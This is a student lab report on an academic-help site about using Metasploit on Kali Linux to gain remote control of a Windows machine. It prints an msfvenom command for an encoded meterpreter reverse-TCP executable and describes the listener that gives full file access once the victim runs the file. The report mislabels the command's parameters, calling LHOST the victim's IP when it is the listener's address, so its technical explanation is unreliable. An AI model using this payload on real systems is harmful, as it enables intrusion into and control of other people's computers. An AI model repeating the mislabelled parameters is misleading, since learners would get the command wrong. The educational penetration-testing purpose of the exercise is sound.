PricingBlogAbout Us

Ethical Hacking ICT: Kali Linux Metasploit Exploit on Windows

Verified

Added on  2023/06/04

|4
|852
|443
Practical Assignment
AI Summary
This assignment focuses on exploiting Windows operating systems using the Metasploit framework within a Kali Linux environment. The practical exercise demonstrates how to gain full user rights on a target machine remotely. The process involves setting up two machines on the same NAT network, one running Windows and the other Kali Linux with Metasploit. The assignment details the use of the 'msfconsole' command to create an executable file containing the target machine's IP address and PORT number. Once the file is sent and executed on the victim's machine, the Metasploit framework listens for the connection, activating the 'meterpreter' option, which grants full access. The assignment concludes by listing the various actions that can be performed on the compromised system, such as file manipulation and directory navigation, illustrating a successful remote exploitation.
Document Page
Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date
tabler-icon-diamond-filled.svg

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
Document Page
ICT ETHICAL HACKING (EXPLOITS) 2
The exploit we developed during the workshop targeted machines operating under
windows operating systems and we used the metasploit framework to achieve that. The approach
was aimed at enabling us get into the victims machine with full user rights just like it is the case
when the owner physically logs into the system. Metasploit framework is defined as a project
that enables development of ID signatures and penetration testing remotely. The tool enabled us
develop and execute an exploit code against a windows operating system machine which was
operating remotely (Dieterle, 2016).
There were various requirements for us to demonstrate how the exploit could be
achieved. These were: two machines under the same NAT network, two different Windows and
Linux). Each of these Operating systems was installed in the two machines available and a
Metasploit framework containing all the Ruby packages. This framework was then installed on
the machine operating under Kali Linux platform and which would be used as the operating
platform to execute the exploit. Since presence of an operating system in the target machine
could hinder smooth execution of the exploit, we made sure that there was no any antivirus
software running in the target machine before we could launch the penetration tests (Holik,
Horalek, Marik, Neradova & Zitta, 2014, p.240). Out of the many commands which could have
been used to facilitate the exploitation, we chose to use the Msfconsole command because of its
supportive features on the tools under the framework as well as its flexibility. The command
provided us with handy-all- in –one interface in all the framework settings.
To penetrate into the victim’s machine and which was operating under Windows
platform, we only needed to know both the machine IP address and any of its free PORT
number. Considering that the two machines were operating under the same NAT network, to
obtain these two components was easy using Netcut software.
Document Page
ICT ETHICAL HACKING (EXPLOITS) 3
Using the two specifications (IP address and PORT number) we then came up with an
executable folder which contained several .exe files and whose identity keys were the two
components (IP address and PORT number) to be sent to the targeted machine in any channel
which was available. For our case, we sent the files through the NAT network. We created the
executable file using a Msfconsole command “msfvenom –p windows/meterpreter/reverse_tcp
LHOST= (IP address of windows machine) LPORT=(PORT in the windows machine) –f exe –e
x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe” (Pritchett & De Smet, 2013).
Immediately after sending the file through the NAT network, we were entitled set
metasploit platform the state of listening and which operates when the Msfconsole is on the
handler status (Weidman, 2014). The command used at this operation was the “exploit”
command. Under the listening state, Metasploit framework waited until the user of the targeted
machine opened the file which had been sent to activate “meterpreter” option and which enabled
us to get full access into the victim’s machine.
In addition to having gotten into this machine remotely, we had all the user rights just
like a person who had physically logged into the machine. Some of the rights we could enjoy at
that juncture were: changing the directories, uploading files, removing directories, navigating
through the files, deleting files, printing local directories as well as working directories and
reading file contents located at any area of the computer system (Muniz, 2013). The ability to
carry out all the above activities without physically logging into the victims computer was an
indication that we had exploited this machine remotely.

This is a preview!

Do you want full access?

icon

Trusted by 1+ million students worldwide

Document Page
ICT ETHICAL HACKING (EXPLOITS) 4
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.
chevron_up_icon
1 out of 4
circle_padding
hide_on_mobile
zoom_out_icon
logo.png

Your All-in-One AI-Powered Toolkit for Academic Success.

  +13062052269
info@desklib.com

Available 24*7 on WhatsApp / Email

[object Object]
Unlock your academic potential

Copyright © 2020–2026 A2Z Services. All Rights Reserved. Developed and managed by ZUCOL.